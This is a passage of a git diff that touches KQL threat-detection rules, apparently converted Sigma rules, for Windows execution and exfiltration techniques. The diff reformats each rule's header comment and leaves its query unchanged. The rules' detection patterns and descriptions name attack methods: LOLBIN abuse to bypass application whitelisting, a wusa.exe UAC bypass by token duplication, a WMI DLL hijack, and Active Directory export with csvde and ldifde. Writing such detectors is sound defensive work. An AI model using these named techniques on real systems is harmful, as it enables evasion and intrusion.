(ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/use_of_openconsole.kql b/KQL/rules/Execution/use_of_openconsole.kql index c788c810..fe0deb3a 100644 --- a/KQL/rules/Execution/use_of_openconsole.kql +++ b/KQL/rules/Execution/use_of_openconsole.kql @@ -1,12 +1,12 @@ -// Title: Use of OpenConsole -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-16 -// Level: medium -// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use by an administrator - -DeviceProcessEvents +// Title: Use of OpenConsole +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-16 +// Level: medium +// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by an administrator + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal")) \ No newline at end of file diff --git a/KQL/rules/Execution/use_of_pcalua_for_execution.kql b/KQL/rules/Execution/use_of_pcalua_for_execution.kql index c207111c..baaccf74 100644 --- a/KQL/rules/Execution/use_of_pcalua_for_execution.kql +++ b/KQL/rules/Execution/use_of_pcalua_for_execution.kql @@ -1,12 +1,12 @@ -// Title: Use of Pcalua For Execution -// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2022-06-14 -// Level: medium -// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use by a via a batch script or by an administrator. - -DeviceProcessEvents +// Title: Use of Pcalua For Execution +// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2022-06-14 +// Level: medium +// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by a via a batch script or by an administrator. + +DeviceProcessEvents | where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql b/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql index 3723f641..cb302d18 100644 --- a/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql +++ b/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql @@ -1,12 +1,12 @@ -// Title: VBA DLL Loaded Via Office Application -// Author: Antonlovesdnb -// Date: 2020-02-19 -// Level: high -// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 -// False Positives: -// - Legitimate macro usage. Add the appropriate filter according to your environment - -DeviceImageLoadEvents +// Title: VBA DLL Loaded Via Office Application +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: high +// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents | where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql index 2b040cef..858789b3 100644 --- a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql +++ b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql @@ -1,12 +1,12 @@ -// Title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-11 -// Level: medium -// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate use by developers as part of NodeJS development with Visual Studio Tools - -DeviceProcessEvents +// Title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use by developers as part of NodeJS development with Visual Studio Tools + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql index 5cc63a7d..3975e524 100644 --- a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql +++ b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql @@ -1,10 +1,10 @@ -// Title: Visual Studio NodejsTools PressAnyKey Renamed Execution -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2023-04-11 -// Level: medium -// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Visual Studio NodejsTools PressAnyKey Renamed Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2023-04-11 +// Level: medium +// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql b/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql index 9a2c15a4..707a88f1 100644 --- a/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql +++ b/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql @@ -1,12 +1,12 @@ -// Title: VMToolsd Suspicious Child Process -// Author: bohops, Bhabesh Raj -// Date: 2021-10-08 -// Level: high -// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.t1059 -// False Positives: -// - Legitimate use by VM administrator - -DeviceProcessEvents +// Title: VMToolsd Suspicious Child Process +// Author: bohops, Bhabesh Raj +// Date: 2021-10-08 +// Level: high +// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059 +// False Positives: +// - Legitimate use by VM administrator + +DeviceProcessEvents | where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql index 886b490c..83ee6204 100644 --- a/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql b/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql index 34de7ab7..6b5f1455 100644 --- a/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql +++ b/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql @@ -1,10 +1,10 @@ -// Title: Windows Shell/Scripting Application File Write to Suspicious Folder -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-20 -// Level: high -// Description: Detects Windows shells and scripting applications that write files to suspicious folders -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceFileEvents +// Title: Windows Shell/Scripting Application File Write to Suspicious Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-20 +// Level: high +// Description: Detects Windows shells and scripting applications that write files to suspicious folders +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\sh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath startswith "C:\\PerfLogs\\" or FolderPath startswith "C:\\Users\\Public\\")) or ((InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\forfiles.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe") and (FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql b/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql index da1becd3..46a52999 100644 --- a/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql +++ b/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql @@ -1,10 +1,10 @@ -// Title: WinSxS Executable File Creation By Non-System Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-11 -// Level: medium -// Description: Detects the creation of binaries in the WinSxS folder by non-system processes -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceFileEvents +// Title: WinSxS Executable File Creation By Non-System Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-11 +// Level: medium +// Description: Detects the creation of binaries in the WinSxS folder by non-system processes +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceFileEvents | where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/wmic_remote_command_execution.kql b/KQL/rules/Execution/wmic_remote_command_execution.kql index e50bd567..4cf2f286 100644 --- a/KQL/rules/Execution/wmic_remote_command_execution.kql +++ b/KQL/rules/Execution/wmic_remote_command_execution.kql @@ -1,10 +1,10 @@ -// Title: WMIC Remote Command Execution -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-14 -// Level: medium -// Description: Detects the execution of WMIC to query information on a remote system -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: WMIC Remote Command Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC to query information on a remote system +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-node:" or ProcessCommandLine contains "/node:" or ProcessCommandLine contains "–node:" or ProcessCommandLine contains "—node:" or ProcessCommandLine contains "―node:") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "localhost" or ProcessCommandLine contains "127.0.0.1"))) \ No newline at end of file diff --git a/KQL/rules/Execution/wmiprvse_spawned_a_process.kql b/KQL/rules/Execution/wmiprvse_spawned_a_process.kql index ae0f8e79..e6735784 100644 --- a/KQL/rules/Execution/wmiprvse_spawned_a_process.kql +++ b/KQL/rules/Execution/wmiprvse_spawned_a_process.kql @@ -1,12 +1,12 @@ -// Title: WmiPrvSE Spawned A Process -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019-08-15 -// Level: medium -// Description: Detects WmiPrvSE spawning a process -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 -// False Positives: -// - False positives are expected (e.g. in environments where WinRM is used legitimately) - -DeviceProcessEvents +// Title: WmiPrvSE Spawned A Process +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-15 +// Level: medium +// Description: Detects WmiPrvSE spawning a process +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 +// False Positives: +// - False positives are expected (e.g. in environments where WinRM is used legitimately) + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql index b4e26873..b72e7a95 100644 --- a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql +++ b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql @@ -1,10 +1,10 @@ -// Title: Wmiprvse Wbemcomn DLL Hijack -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-12 -// Level: high -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 - -DeviceImageLoadEvents +// Title: Wmiprvse Wbemcomn DLL Hijack +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: high +// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 + +DeviceImageLoadEvents | where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql index f6e0b02d..33a1e19f 100644 --- a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql +++ b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql @@ -1,10 +1,10 @@ -// Title: Wmiprvse Wbemcomn DLL Hijack - File -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-12 -// Level: critical -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 - -DeviceFileEvents +// Title: Wmiprvse Wbemcomn DLL Hijack - File +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: critical +// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 + +DeviceFileEvents | where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll" \ No newline at end of file diff --git a/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql b/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql index 8694f687..f10c0b30 100644 --- a/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql +++ b/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql @@ -1,10 +1,10 @@ -// Title: WScript or CScript Dropper - File -// Author: Tim Shelton -// Date: 2022-01-10 -// Level: high -// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.t1059.007 - -DeviceFileEvents +// Title: WScript or CScript Dropper - File +// Author: Tim Shelton +// Date: 2022-01-10 +// Level: high +// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData") \ No newline at end of file diff --git a/KQL/rules/Execution/wscript_shell_run_in_commandline.kql b/KQL/rules/Execution/wscript_shell_run_in_commandline.kql index 1ce27ea6..57b5d581 100644 --- a/KQL/rules/Execution/wscript_shell_run_in_commandline.kql +++ b/KQL/rules/Execution/wscript_shell_run_in_commandline.kql @@ -1,12 +1,12 @@ -// Title: Wscript Shell Run In CommandLine -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-31 -// Level: medium -// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly - -DeviceProcessEvents +// Title: Wscript Shell Run In CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-31 +// Level: medium +// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly + +DeviceProcessEvents | where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run" \ No newline at end of file diff --git a/KQL/rules/Execution/wsl_child_process_anomaly.kql b/KQL/rules/Execution/wsl_child_process_anomaly.kql index ee953413..8975570c 100644 --- a/KQL/rules/Execution/wsl_child_process_anomaly.kql +++ b/KQL/rules/Execution/wsl_child_process_anomaly.kql @@ -1,10 +1,10 @@ -// Title: WSL Child Process Anomaly -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-23 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 - -DeviceProcessEvents +// Title: WSL Child Process Anomaly +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-23 +// Level: medium +// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql index ab9c6fc9..e708dda6 100644 --- a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql +++ b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql @@ -1,11 +1,11 @@ -// Title: Wusa.EXE Executed By Parent Process Located In Suspicious Location -// Author: X__Junior (Nextron Systems) -// Date: 2023-11-26 -// Level: high -// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. -// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Wusa.EXE Executed By Parent Process Located In Suspicious Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-26 +// Level: high +// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. +// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) and (not(ProcessCommandLine contains ".msu")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql b/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql index c25f0f74..760ddca2 100644 --- a/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql +++ b/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql @@ -1,10 +1,10 @@ -// Title: Active Directory Structure Export Via Csvde.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-14 -// Level: medium -// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.discovery, attack.t1087.002 - -DeviceProcessEvents +// Title: Active Directory Structure Export Via Csvde.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1087.002 + +DeviceProcessEvents | where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql b/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql index 5f3de5a1..7867876f 100644 --- a/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql +++ b/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql @@ -1,10 +1,10 @@ -// Title: Active Directory Structure Export Via Ldifde.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-14 -// Level: medium -// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration - -DeviceProcessEvents +// Title: Active Directory Structure Export Via Ldifde.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration + +DeviceProcessEvents | where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql index 059a5181..841d0dc5 100644 --- a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql +++ b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql @@ -1,12 +1,12 @@ -// Title: Arbitrary File Download Via ConfigSecurityPolicy.EXE -// Author: frack113 -// Date: 2021-11-26 -// Level: medium -// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. -// Users can configure different pilot collections for each of the co-management workloads. -// It can be abused by attackers in order to upload or download files. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1567 - -DeviceProcessEvents +// Title: Arbitrary File Download Via ConfigSecurityPolicy.EXE +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. +// Users can configure different pilot collections for each of the co-management workloads. +// It can be abused by attackers in order to upload or download files. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567 + +DeviceProcessEvents | where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql index 1f8f07f6..405d7d7e 100644 --- a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql +++ 